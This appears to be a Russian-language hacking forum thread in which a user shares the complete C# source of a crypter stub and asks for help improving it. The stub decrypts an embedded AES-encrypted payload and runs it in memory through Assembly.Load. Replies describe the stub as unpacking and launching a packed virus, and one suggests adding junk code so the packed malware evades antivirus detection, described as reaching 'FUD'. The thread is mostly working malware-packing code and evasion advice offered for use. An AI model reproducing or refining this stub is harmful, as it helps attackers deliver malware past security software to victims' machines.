Софт Криптор на C#

yanhuda2282 · 27 Янв 2022

Всем здравствуйте! Решил сделать криптор на с#

.Так вот и я остановился на том что я нашел исходники старого криптора и переделал его просто до не узнаваемости!

Пожалуйста, авторизуйтесь для просмотра ссылки.

- нажать на гуи откроется фото

Вот почему я и написал возникла проблемка нужно корректировать стаб но я полный 0 в этом. НЕ могли бы вы дать пару статей за рубежом т.к там более понятные темы и по делу.

Сам код Стаба

C#:

using System;
using System.IO;
using System.Reflection;
using System.Security.Cryptography;

namespace Stub
{
    static class cMain
    {
        private static byte[] bSalt = new byte[] { 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0 };
        public static byte[] Decrypt(byte[] bData, byte[] bKey)
        {
            byte[] bDecrypted = null;

            using (MemoryStream mStream = new MemoryStream())
            {
                using (RijndaelManaged rmAES = new RijndaelManaged())
                {
                    rmAES.KeySize = 256;
                    rmAES.BlockSize = 128;

                    Rfc2898DeriveBytes rfcKey = new Rfc2898DeriveBytes(bKey, bSalt, 1000);

                    rmAES.Key = rfcKey.GetBytes(rmAES.KeySize / 8);
                    rmAES.IV = rfcKey.GetBytes(rmAES.BlockSize / 8);

                    rmAES.Mode = CipherMode.CBC;

                    using (CryptoStream cStream = new CryptoStream(mStream, rmAES.CreateDecryptor(), CryptoStreamMode.Write))
                    {
                        cStream.Write(bData, 0, bData.Length);
                        cStream.Close();
                    }

                    bDecrypted = mStream.ToArray();
                }
            }

            return bDecrypted;
        }

        [STAThread]
        static void Main()
        {
            Assembly aASM = Assembly.GetExecutingAssembly();

            using (Stream sResStream = aASM.GetManifestResourceStream("%RES_NAME%"))
            {
                if (sResStream == null)
                    return;

                byte[] bFile = new byte[sResStream.Length];
                sResStream.Read(bFile, 0, bFile.Length);

                bFile = Decrypt(bFile, System.Text.Encoding.Default.GetBytes("%ENC_KEY%"));

                Assembly.Load(bFile).EntryPoint.Invoke(null, null);

            }
        }
    }
}

Всем кто поможет буду мега благодарен!!!
Еще кому не сложно объяснить что в этом стабе происходит.

dzh1gurd4 · 28 Янв 2022

Пожалуйста, авторизуйтесь для просмотра ссылки.

+

Пожалуйста, авторизуйтесь для просмотра ссылки.

Гайд - [.NET C#] Учимся создавать деобфускатор | Игровой форум YouGame.Biz

Kaidoz · 23 Фев 2022

yanhuda2282 написал(а):
using (Stream sResStream = aASM.GetManifestResourceStream("%RES_NAME%")) { if (sResStream == null) return; byte[] bFile = new byte[sResStream.Length]; sResStream.Read(bFile, 0, bFile.Length);

Чтение запакованного вируса из ресурсов.

yanhuda2282 написал(а):
bFile = Decrypt(bFile, System.Text.Encoding.Default.GetBytes("%ENC_KEY%"));

Дешифровка запакованного вируса

yanhuda2282 написал(а):
Assembly.Load(bFile).EntryPoint.Invoke(null, null);

Запуск через Assembly.Load

Данный способ работает только c .net приложениями. К тому же данный стаб с большей вероятностью у всех антивирусов будет детектиться. Нужен всякий различный мусорный код(ни раз конечно говорили, что это ничего дает, но по моим наблюдениям помогало почти до fud результата).

Jacellen · 23 Фев 2022

Kaidoz написал(а):
Чтение запакованного вируса из ресурсов.

Дешифровка запакованного вируса

Запуск через Assembly.Load

Данный способ работает только c .net приложениями. К тому же данный стаб с большей вероятностью у всех антивирусов будет детектиться. Нужен всякий различный мусорный код(ни раз конечно говорили, что это ничего дает, но по моим наблюдениям помогало почти до fud результата).

Пожалуйста, зарегистрируйтесь или авторизуйтесь, чтобы увидеть содержимое.

z0rdexx · 2 Апр 2022

Пожалуйста, авторизуйтесь для просмотра ссылки.

клик